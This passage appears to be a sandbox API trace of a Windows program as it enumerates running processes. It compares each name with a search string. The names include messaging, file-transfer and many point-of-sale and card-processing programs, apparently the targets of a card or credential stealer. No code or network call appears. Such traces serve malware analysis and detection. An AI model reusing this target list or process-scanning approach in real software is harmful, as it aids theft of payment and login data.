lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.834] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3573ed8 [0095.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3573ed8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0095.835] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0095.835] StrStrIA (lpFirst="thunderbird.exe", lpSrch="ocomm") returned 0x0 [0095.835] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0095.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.836] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573f50 [0095.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3573f50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0095.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0095.836] StrStrIA (lpFirst="totalcmd.exe", lpSrch="ocomm") returned 0x0 [0095.836] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0095.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.837] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573f38 [0095.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3573f38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0095.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0095.837] StrStrIA (lpFirst="trillian.exe", lpSrch="ocomm") returned 0x0 [0095.837] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0095.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.838] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573cf8 [0095.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3573cf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0095.838] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0095.838] StrStrIA (lpFirst="webdrive.exe", lpSrch="ocomm") returned 0x0 [0095.838] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0095.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.839] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573ec0 [0095.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3573ec0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.839] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0095.839] StrStrIA (lpFirst="whatsapp.exe", lpSrch="ocomm") returned 0x0 [0095.839] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0095.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.840] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573f08 [0095.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3573f08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0095.840] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0095.840] StrStrIA (lpFirst="winscp.exe", lpSrch="ocomm") returned 0x0 [0095.840] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0095.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.842] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575c40 [0095.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3575c40, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0095.842] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0095.842] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="ocomm") returned 0x0 [0095.842] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0095.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.843] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575b20 [0095.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3575b20, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0095.844] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0095.844] StrStrIA (lpFirst="active-charge.exe", lpSrch="ocomm") returned 0x0 [0095.844] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0095.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.845] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573f20 [0095.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3573f20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.845] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0095.845] StrStrIA (lpFirst="accupos.exe", lpSrch="ocomm") returned 0x0 [0095.845] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0095.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.847] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573d58 [0095.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3573d58, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0095.848] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0095.848] StrStrIA (lpFirst="afr38.exe", lpSrch="ocomm") returned 0x0 [0095.848] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0095.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.849] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573d88 [0095.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3573d88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0095.849] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0095.849] StrStrIA (lpFirst="aldelo.exe", lpSrch="ocomm") returned 0x0 [0095.849] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0095.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.857] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3573f68 [0095.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3573f68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0095.857] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0095.858] StrStrIA (lpFirst="ccv_server.exe", lpSrch="ocomm") returned 0x0 [0095.858] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0095.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0095.859] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3575880 [0095.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3575880, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0095.859] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0095.859] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="ocomm") returned 0x0 [0095.859] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0095.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.861] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575c20 [0095.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575c20, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0095.861] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0095.861] StrStrIA (lpFirst="creditservice.exe", lpSrch="ocomm") returned 0x0 [0095.861] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0095.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.863] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573d10 [0095.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3573d10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0095.863] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0095.863] StrStrIA (lpFirst="edcsvr.exe", lpSrch="ocomm") returned 0x0 [0095.863] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0095.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.865] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573c80 [0095.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3573c80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0095.865] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0095.865] StrStrIA (lpFirst="fpos.exe", lpSrch="ocomm") returned 0x0 [0095.865] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0095.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.866] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573d40 [0095.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3573d40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0095.866] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0095.866] StrStrIA (lpFirst="isspos.exe", lpSrch="ocomm") returned 0x0 [0095.866] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0095.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.867] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575a60 [0095.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3575a60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0095.867] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0095.867] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="ocomm") returned 0x0 [0095.867] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0095.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.869] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573c98 [0095.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3573c98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.869] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0095.869] StrStrIA (lpFirst="omnipos.exe", lpSrch="ocomm") returned 0x0 [0095.869] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0095.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.871] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573cb0 [0095.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3573cb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.871] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0095.871] StrStrIA (lpFirst="spcwin.exe", lpSrch="ocomm") returned 0x0 [0095.871] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0095.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.873] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3575920 [0095.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575920, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0095.873] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0095.873] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="ocomm") returned 0x0 [0095.873] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0095.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.874] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573e18 [0095.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3573e18, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0095.874] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0095.874] StrStrIA (lpFirst="utg2.exe", lpSrch="ocomm") returned 0x0 [0095.874] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0095.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.876] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573cc8 [0095.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3573cc8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0095.876] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0095.876] StrStrIA (lpFirst="saying.exe", lpSrch="ocomm") returned 0x0 [0095.876] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0095.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", 